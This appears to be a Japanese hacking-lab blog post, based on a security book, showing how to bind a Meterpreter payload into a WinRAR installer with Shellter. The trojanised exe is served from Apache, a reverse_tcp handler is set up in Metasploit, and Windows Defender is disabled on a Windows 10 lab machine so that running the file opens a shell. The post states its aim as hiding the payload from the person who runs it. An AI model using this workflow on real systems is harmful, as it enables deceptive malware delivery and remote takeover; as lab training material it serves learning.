ペイロードをexeファイルにバインドする方法

Windows 10

今回は、ペイロードを exe ファイルにバインドして Windows 10 に実行させます。

バインドとは

まずバインドとは何かというと「結合する」「紐付ける」という意味です。今回で言うと、ペイロードと exe ファイルという 2つのファイルを結合して 1つのファイルにします。

なぜバインドする?

わざわざなんでそんなことをするのかと思うかもしれません。これには理由があって、ペイロード単体で実行させると特に何もアクションがなかったり一瞬別画面が表示されたりと、怪しい動きをします。
これだと、実行した人が不審に思い、悪意のあるファイルだと気がついてしまします。

しかし、ペイロードに別ファイルをバインドすると、1つのファイルが同時に実行され、ペイロードの不審な動きを隠蔽できるというわけです。
今回は、exeファイルをペイロードにバインドしてみます。

exeファイルの用意

任意の exeファイルを用意します。「ハッキングラボのつくりかた」に書いてある WINRAR を以下URLからダウンロードします。(DL は自己責任でお願いします)

WinRAR ダウンロード | WinRAR - RAR、ZIPに完全対応。RAR・ZIP・CAB・GZUP・ACEなど幅広い形式の圧縮・解凍が可能。Windows7対応日本語版。
WinRAR無料版を今すぐダウンロード。-最強の圧縮・解凍ユーティリティ Windows7 対応版 WinRAR 4.01 登場!RAR・ZIP・LZH・ISO・tar・ACE・CAB・GZIP・ARJなどあらゆる圧縮形式に対応しています

ダウンロードした exeファイルは Kali に配置します。

shellter のインストール

shellter というソフトを用いて、ペイロードと exe ファイルのバインドを行います。
以下のコマンドを実行し、shellter をインストールします。

root@kali:~/Downloads/Windows# apt install shellter

ペイロードを exeファイルにバインド

shellter の起動

インストールが終わったら shellter を起動します。以下のコマンドを実行すると、別画面で shellter が起動します。

root@kali:~/Downloads/Windows# shellter

shellter の操作

起動すると、オペレーションモードを尋ねられるので、”A”を押下します。
その後、バインドする exe ファイルのファイル名を入力します。

その後メッセージが何行か出力され、 ペイロード関連の設定をいくつか行います。以下の画面の通り入力しました。

するとまたメッセージが何行か出力されるので、 Enter の入力を促されたら Enter を入力して終了してください。
これで、指定した exeファイルにペイロードがバインドされました。
試しに、Windows 10 で exe ファイルを実行してセッションが確立されるか確認します。

バインドされたペイロードの実行

ペイロードの公開

いつも通り、WEBサーバの公開ディレクトリにファイルを配置します。

root@kali:~/Desktop# cp wrar580jp.exe /var/www/html/share
root@kali:~/Desktop# service apache2 restart
root@kali:~/Desktop#

リバースシェルを待ち受ける

ペイロードを実行する前に、Kali でリバースシェルを待ち受けます。

msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 10.0.0.2
lhost => 10.0.0.2
msf5 exploit(multi/handler) > set lport 4444
lport => 4444
msf5 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 10.0.0.2:4444

ペイロードの実行

Windows 10 で Kali から exeファイルをダウンロードし、実行します。ダウンロードの段階で Windows Defender で引っかかるのでリアルタイム保護を無効にします。
ダウンロードが終わったら exeファイルを実行します。

上記画像のように、exeファイルの実行画面と同時にセッションが確立されました。普通に exeファイルを実行するのとなんら変わりはないため、実行者は特に意識することなくセッションを確立してしまいます。

今回は exeファイルのバインドによるペイロードの隠蔽を行いました。次回は画像ファイルのバインドを行う予定です。

くどり

この記事は「ハッキング・ラボのつくりかた 第4章 」をベースに作成しています。購入リンクは以下です。
※Amazonアソシエイトを使用しています。

コメント

タイトルとURLをコピーしました